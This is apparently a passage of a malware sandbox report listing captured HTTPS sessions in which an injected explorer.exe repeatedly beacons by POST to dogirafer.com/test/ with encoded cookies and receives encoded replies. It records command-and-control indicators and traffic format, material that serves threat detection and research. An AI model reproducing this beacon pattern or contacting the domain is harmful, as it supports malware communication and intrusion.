                                                                                                                                                                              2024-12-03 16:46:13 UTC343INData Raw: 31 35 30 0d 0a 4f 43 79 55 52 38 71 32 74 75 52 6b 59 42 6e 62 6a 57 4b 73 7a 6e 64 50 4d 30 2f 54 41 55 36 73 61 2f 75 79 75 43 44 4d 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 35 73 4c 6b 4d 72 63 35 75 4f 67 46 6f 68 43 72 71 38 74 75 30 44 74 35 43 6d 6f 63 67 39 67 69 6c 57 48 47 5a 4f 37 63 72 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 63 45 34 41 75 2f 6d 4a 33 4d 58 62 4c 37 44 65 58 51 6c 71 34 4e 41 37 46 54 66 41 52 6f 70 68 6b 41 34 4d 6c 67 42 50 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 4a 57 51 4a
                                                                                                                                                                              Data Ascii: 150OCyUR8q2tuRkYBnbjWKszndPM0/TAU6sa/uyuCDMKRib7xuPoA21j4bUiz5sLkMrc5uOgFohCrq8tu0Dt5Cmocg9gilWHGZO7crsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4FcE4Au/mJ3MXbL7DeXQlq4NA7FTfARophkA4MlgBPsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfJWQJ
                                                                                                                                                                              2024-12-03 16:46:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              25192.168.2.450032104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:14 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:15 UTC791INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:15 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MAEfbb%2FUgAUeb6WG%2FaDnt6ChMMd8yeSY2USxKjjKY2nqkl7Gj12DvMvP%2Fd%2FnKQ%2BIMZ1uN4%2BrwWFXZbqTnDG7pxNhog8c63lYSk2ZJd66sbK%2BLNXD6ujDrocUTyZOifE2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5081ea90543dd-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1663&rtt_var=653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1638608&cwnd=196&unsent_bytes=0&cid=7d3aa0c2c9f6bb9a&ts=1411&x=0"
                                                                                                                                                                              2024-12-03 16:46:15 UTC343INData Raw: 31 35 30 0d 0a 4f 53 32 59 51 73 57 78 32 49 70 6c 61 78 6a 5a 67 6d 37 67 67 33 64 4a 50 6b 33 66 41 53 62 43 61 50 75 7a 76 43 65 41 57 42 2f 53 34 42 4b 4c 73 77 71 79 6b 63 66 54 73 6a 46 75 4c 6b 4d 70 66 50 7a 70 67 56 38 72 44 37 71 35 2f 61 55 49 73 5a 53 73 6f 73 31 52 36 69 46 52 47 57 46 50 37 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 45 45 73 38 30 42 2b 2f 6c 54 68 51 53 61 72 2f 49 63 33 46 68 34 59 46 50 36 6c 4c 5a 44 58 5a 48 67 55 34 37 4e 46 70 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 68 4f 50 64 52 51 70
                                                                                                                                                                              Data Ascii: 150OS2YQsWx2IplaxjZgm7gg3dJPk3fASbCaPuzvCeAWB/S4BKLswqykcfTsjFuLkMpfPzpgV8rD7q5/aUIsZSsos1R6iFRGWFP74+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzEEs80B+/lThQSar/Ic3Fh4YFP6lLZDXZHgU47NFpEA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbhOPdRQp
                                                                                                                                                                              2024-12-03 16:46:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              26192.168.2.450033104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:17 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:18 UTC783INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:18 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cm5obXRDuYf6xfSmnZ4jC4BXXZkiOGXPCBm0C162jmm51lHIuI26Be5Vxe7VeCNCNQbex3QZqLcwOU6UK7UNSM4qsFPB0T%2BjJkp9i4Jd7HbakY%2BY%2BES0rdJEvU67gpwL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5082ffe9f7ca5-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1761&rtt_var=685&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1569048&cwnd=242&unsent_bytes=0&cid=c913668be4adf778&ts=1627&x=0"
                                                                                                                                                                              2024-12-03 16:46:18 UTC343INData Raw: 31 35 30 0d 0a 4f 79 57 5a 54 4d 71 37 32 49 70 69 5a 68 72 51 68 47 62 6f 67 33 56 4b 4f 55 2f 53 41 53 48 43 61 2f 2b 78 76 53 4c 4c 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 4a 45 63 71 65 70 58 70 37 46 73 67 44 62 53 33 73 4b 46 47 75 35 4b 70 72 63 38 36 36 55 35 54 48 47 70 46 36 73 4f 68 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 38 77 42 4f 37 71 49 78 31 2b 61 72 48 45 65 48 6b 6f 37 38 74 50 37 6c 4c 64 43 52 46 4f 37 45 34 2b 4d 31 6f 4a 4e 6f 7a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 62 51 5a
                                                                                                                                                                              Data Ascii: 150OyWZTMq72IpiZhrQhGbog3VKOU/SASHCa/+xvSLLZmmcphSGpB6yiJiVjA1mJEcqepXp7FsgDbS3sKFGu5Kprc866U5THGpF6sOhfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc8wBO7qIx1+arHEeHko78tP7lLdCRFO7E4+M1oJNozMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1bQZ
                                                                                                                                                                              2024-12-03 16:46:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              27192.168.2.450034104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:20 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:22 UTC781INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:22 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HrEpT2g3sTm%2BYJCuX2XCr2lV8yDXL2rFjadoUeU4wW0GxicFhlMJBSRjErN69%2BSpCeLJ6RK7FVTkn6w6vdpVEBcWGVz2jULRRYz41PMPIxP0YgQEs0q317PGru2ZiCh8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec50845ec9572ad-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1794&rtt_var=705&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1518460&cwnd=228&unsent_bytes=0&cid=ad999ba432ac9201&ts=1596&x=0"
                                                                                                                                                                              2024-12-03 16:46:22 UTC347INData Raw: 31 35 34 0d 0a 4d 79 79 62 51 38 61 37 32 6f 70 67 5a 78 6a 59 67 6d 48 70 67 33 4a 49 50 55 7a 52 42 53 48 43 61 66 36 30 76 43 44 4a 5a 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 4c 30 59 6a 65 4a 62 6b 37 46 59 67 43 37 4b 33 73 61 4e 47 74 4a 65 74 6f 4d 67 37 36 45 35 56 47 32 5a 4f 37 38 75 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 38 31 44 4f 7a 67 4a 78 6c 2b 61 37 62 44 65 6e 45 73 34 63 74 46 36 56 50 63 43 78 6c 42 37 45 30 2f 4d 46 67 49 4e 34 2f 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 61 52 5a
                                                                                                                                                                              Data Ascii: 154MyybQ8a72opgZxjYgmHpg3JIPUzRBSHCaf60vCDJZGmcphSGpB6yiJiVjA1nL0YjeJbk7FYgC7K3saNGtJetoMg76E5VG2ZO78unfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc81DOzgJxl+a7bDenEs4ctF6VPcCxlB7E0/MFgIN4/MfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1aRZ
                                                                                                                                                                              2024-12-03 16:46:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              28192.168.2.450035104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:23 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:25 UTC779INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:25 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dvab0nqMTHUBnTao14tXg0S4S22u8lOgJkDWrCmM67ArKcaUyonZizj3yHUDKBLmQmGFIgrkt9RDAlzFPsNlC2pfdSPnU2Bel%2FOJ9arIX0urJjsVnEGBLzJ6yeF3432V"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec50858698c0f79-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1519&rtt_var=589&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1922317&cwnd=241&unsent_bytes=0&cid=68f12b03fa80e1b9&ts=1421&x=0"
                                                                                                                                                                              2024-12-03 16:46:25 UTC343INData Raw: 31 35 30 0d 0a 50 43 53 56 52 38 53 31 33 59 70 68 5a 68 33 61 68 32 43 73 79 33 35 49 50 6b 6e 52 41 55 36 71 61 76 65 33 74 79 48 4d 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 39 70 4a 6b 34 74 63 70 53 4f 67 6c 6f 6b 43 62 47 39 74 4f 30 49 73 4a 65 6f 70 63 38 35 67 69 6c 54 47 47 46 50 37 38 48 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 63 30 79 44 4f 4c 6a 49 58 4d 57 62 4c 54 41 63 33 67 72 71 34 35 42 37 56 76 66 41 42 41 70 67 55 6f 30 4e 56 6f 4f 50 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 4a 53 54 70
                                                                                                                                                                              Data Ascii: 150PCSVR8S13YphZh3ah2Csy35IPknRAU6qave3tyHMKRib7xuPoA21j4bUiz9pJk4tcpSOglokCbG9tO0IsJeopc85gilTGGFP78HsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Fc0yDOLjIXMWbLTAc3grq45B7VvfABApgUo0NVoOPsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfJSTp
                                                                                                                                                                              2024-12-03 16:46:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              29192.168.2.450036104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:26 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:28 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:28 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fe%2BUBROKIGxcWS%2FliGAUW8skJE7s8TjPR692cfzjbICu75YJFCyEQN4gEQuAmlMav6X1zNj4HTazxRixD7QXfPAypU9%2BmPs%2BlmmtysWKGHwhZZKRtiaNua9Wzpj6SeEx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5086999a47cee-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1826&rtt_var=706&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1527995&cwnd=167&unsent_bytes=0&cid=7fbe694f3dd9f4c0&ts=1640&x=0"
                                                                                                                                                                              2024-12-03 16:46:28 UTC343INData Raw: 31 35 30 0d 0a 4f 79 75 65 54 4d 47 37 33 59 70 76 5a 52 72 66 68 57 50 67 67 33 39 48 4f 30 72 58 44 43 48 43 62 50 36 32 76 69 2f 46 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 76 49 55 55 76 65 4a 62 6e 37 46 59 6e 43 4c 57 34 74 71 5a 47 74 5a 47 6d 70 63 6f 39 37 30 35 52 48 6d 4a 45 36 63 4f 6a 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 77 78 42 2b 2f 69 4a 78 6c 2b 62 62 58 41 66 33 59 73 71 34 56 45 37 6c 54 64 41 48 5a 43 67 45 6b 34 4f 46 67 49 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 76 56 53 54 70
                                                                                                                                                                              Data Ascii: 150OyueTMG73YpvZRrfhWPgg39HO0rXDCHCbP62vi/FYGmcphSGpB6yiJiVjA1vIUUveJbn7FYnCLW4tqZGtZGmpco9705RHmJE6cOjfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcwxB+/iJxl+bbXAf3Ysq4VE7lTdAHZCgEk4OFgIcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOvVSTp
                                                                                                                                                                              2024-12-03 16:46:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              30192.168.2.450037104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:29 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:31 UTC781INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:31 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPGOJTYGH1N8bdbZB0RvvbyRsSrtOUiRsQB8ZfakFedx6xpWAAFAiEbT4Lc%2FaqB%2BWheU3qogKZOhQBytjtkgo96N9BjGhhK0jXZUaOXaPgvf7D3r8WE6ZSCQmD0GDaA9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5087c8e9b4244-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1623&rtt_var=615&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1769696&cwnd=218&unsent_bytes=0&cid=05b5d20c280a1ece&ts=1611&x=0"
                                                                                                                                                                              2024-12-03 16:46:31 UTC343INData Raw: 31 35 30 0d 0a 4f 79 2b 5a 52 63 47 77 30 49 70 67 5a 78 7a 5a 68 32 50 6d 67 33 39 4b 4d 30 2f 51 42 43 50 43 62 66 71 37 76 53 54 45 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 49 6b 49 6f 63 35 76 6e 37 46 6b 67 41 4c 65 34 73 75 30 4a 73 35 53 74 6f 4d 6b 32 67 69 4a 51 46 47 52 4d 36 38 76 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 73 41 33 42 2b 76 72 49 48 4d 59 61 72 44 46 65 48 55 72 71 34 46 43 36 46 58 61 44 78 30 70 68 55 6b 34 4d 56 49 4f 50 63 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 56 52 54 35
                                                                                                                                                                              Data Ascii: 150Oy+ZRcGw0IpgZxzZh2Pmg39KM0/QBCPCbfq7vSTEZmmcphSGpB6yiJiVjA1pIkIoc5vn7FkgALe4su0Js5StoMk2giJQFGRM68vsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EsA3B+vrIHMYarDFeHUrq4FC6FXaDx0phUk4MVIOPcC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfVRT5
                                                                                                                                                                              2024-12-03 16:46:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              31192.168.2.450038104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:32 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:34 UTC783INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:33 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vShW1Mk2WSUlhUXMGyAI%2BDwwQpgdA1DfuaGXwPSiHcTawio1DAYQSTIX%2FphMdB24myHwWmMy1gadvpTw8Q7o3mT48K9uVn55Ud3XGBDbJ0Tlfe7HD3hpA8%2BiX9mATSUq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5088f1d31f5fa-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1487&min_rtt=1482&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1912246&cwnd=252&unsent_bytes=0&cid=cc60c2aa4db641a0&ts=1635&x=0"
